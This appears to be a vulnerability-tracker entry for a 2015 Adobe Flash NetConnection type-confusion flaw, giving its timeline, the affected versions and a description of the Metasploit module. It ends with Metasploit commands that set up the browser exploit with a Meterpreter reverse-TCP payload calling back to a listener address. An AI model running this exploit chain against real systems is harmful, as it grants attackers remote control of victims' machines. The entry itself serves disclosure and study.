Timeline :
Vulnerability discovered and reported to the vendor by Natalie Silvanovich in January 2015
Patch provided by the vendor via APSA15-05 the 2015-03-12
Vulnerability found exploited into exploit kits the 2015-03-19
Details of the vulnerability provided by Google Security the 2015-04-13
Metasploit PoC provided the 2015-05-28
PoC provided by :
Natalie Silvanovich
Unknown
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions
Tested on :
Windows 7 SP1 with IE 8 and Flash 16.0.0.305
Description :
This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and ultimately accomplish remote code execution. This module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.
* Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.
Commands :
use exploit/multi/browser/adobe_flash_net_connection_confusion set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 getuid